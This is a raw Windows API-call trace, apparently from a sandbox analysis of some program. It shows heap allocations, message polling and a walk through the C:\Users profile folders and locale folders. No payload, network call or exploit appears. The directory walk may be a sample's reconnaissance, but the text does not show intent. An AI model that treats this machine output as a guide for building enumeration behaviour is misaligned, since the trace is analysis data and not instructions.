RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83db8 [0187.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83d90 [0187.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83d68 [0187.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83d40 [0187.873] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0187.874] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a48 [0187.874] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.874] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83890 [0187.874] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0187.874] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a48 [0187.874] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.874] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83ca0 [0187.874] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0187.874] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a48 [0187.874] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.874] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83958 [0187.874] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0187.874] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a48 [0187.874] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.874] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83c50 [0187.874] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0187.874] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0187.874] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0187.874] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde10 [0187.875] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0187.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddee8 [0187.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0187.875] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0187.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f20 [0187.875] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0187.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a48 [0187.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0187.875] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0187.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f20 [0187.875] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0187.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a48 [0187.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0187.875] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0187.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9680 [0187.875] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0187.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9760 [0187.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0187.878] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0187.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9680 [0187.879] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0187.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9760 [0187.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0187.879] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0187.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f20 [0187.879] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0187.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a48 [0187.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0187.879] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0187.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f20 [0187.879] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0187.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a48 [0187.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0187.879] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0187.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde10 [0187.879] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0187.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddee8 [0187.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0187.879] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0187.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f20 [0187.879] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0187.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a48 [0187.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0187.879] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0187.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f20 [0187.880] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0187.880] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a48 [0187.880] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0187.880] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0187.880] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0187.880] PathFindFileNameW (pszPath="") returned="" [0187.880] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a48 [0187.880] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0187.880] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0187.880] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x2e902a8 [0187.881] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0187.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e765d0 [0187.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0187.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0187.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a48 | out: hHeap=0x620000) returned 1 [0187.882] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0187.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0187.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837f0 | out: hHeap=0x620000) returned 1 [0187.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0187.883] FindFirstFileW (in: lpFileName="C:\\Users\\*" (normalized: "c:\\users\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0187.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837f0 | out: hHeap=0x620000) returned 1 [0187.883] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0187.883] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0187.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9680 [0187.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9760 [0187.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96f0 [0187.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9760 | out: hHeap=0x620000) returned 1 [0187.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9680 | out: hHeap=0x620000) returned 1 [0187.884] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x629b4b20, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x629b4b20, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0187.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9680 [0187.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9760 [0187.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9728 [0187.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9760 | out: hHeap=0x620000) returned 1 [0187.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9680 | out: hHeap=0x620000) returned 1 [0187.885] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0187.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9680 [0187.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9760 [0187.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0187.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9760 | out: hHeap=0x620000) returned 1 [0187.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9680 | out: hHeap=0x620000) returned 1 [0187.886] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0187.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0187.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9680 [0187.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837f0 | out: hHeap=0x620000) returned 1 [0187.886] PathFindExtensionW (pszPath="C:\\Users\\desktop.ini") returned=".ini" [0187.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9680 | out: hHeap=0x620000) returned 1 [0187.887] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xda323040, ftLastAccessTime.dwHighDateTime=0x1d8a8b9, ftLastWriteTime.dwLowDateTime=0xda323040, ftLastWriteTime.dwHighDateTime=0x1d8a8b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 1 [0187.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9680 [0187.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9760 [0187.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2e95a80 [0187.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9760 | out: hHeap=0x620000) returned 1 [0187.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9680 | out: hHeap=0x620000) returned 1 [0187.888] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0187.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0187.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9680 [0187.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837f0 | out: hHeap=0x620000) returned 1 [0187.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9760 [0187.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x498) returned 0x2e935c8 [0187.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0187.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a48 [0187.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83bb0 [0187.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a20 [0187.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83908 [0187.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e839d0 [0187.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83840 [0187.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83778 [0187.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83818 [0187.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83868 [0187.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83c28 [0187.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83bd8 [0187.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cc8 [0187.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0187.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838e0 [0187.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83d18 [0187.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e839f8 [0187.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83930 [0187.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83980 [0187.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83ae8 [0187.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b10 [0187.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b38 [0187.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0187.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2e95ab8 [0187.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2e95af0 [0187.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2e95b28 [0187.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2e95b60 [0187.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0187.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0187.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83700 | out: hHeap=0x620000) returned 1 [0187.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83ac0 | out: hHeap=0x620000) returned 1 [0187.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83c00 | out: hHeap=0x620000) returned 1 [0187.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e839a8 | out: hHeap=0x620000) returned 1 [0187.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83c78 | out: hHeap=0x620000) returned 1 [0187.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b88 | out: hHeap=0x620000) returned 1 [0187.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83ed0 | out: hHeap=0x620000) returned 1 [0187.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83ea8 | out: hHeap=0x620000) returned 1 [0187.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83e80 | out: hHeap=0x620000) returned 1 [0187.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83e58 | out: hHeap=0x620000) returned 1 [0187.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83e30 | out: hHeap=0x620000) returned 1 [0187.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83e08 | out: hHeap=0x620000) returned 1 [0187.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83de0 | out: hHeap=0x620000) returned 1 [0187.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83db8 | out: hHeap=0x620000) returned 1 [0187.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83d90 | out: hHeap=0x620000) returned 1 [0187.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83d68 | out: hHeap=0x620000) returned 1 [0187.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83d40 | out: hHeap=0x620000) returned 1 [0187.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0187.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83890 | out: hHeap=0x620000) returned 1 [0187.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83ca0 | out: hHeap=0x620000) returned 1 [0187.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83958 | out: hHeap=0x620000) returned 1 [0187.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83c50 | out: hHeap=0x620000) returned 1 [0187.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96f0 | out: hHeap=0x620000) returned 1 [0187.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0187.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0187.898] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95a80 | out: hHeap=0x620000) returned 1 [0187.898] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0187.898] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2e95a80 [0187.898] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9760 | out: hHeap=0x620000) returned 1 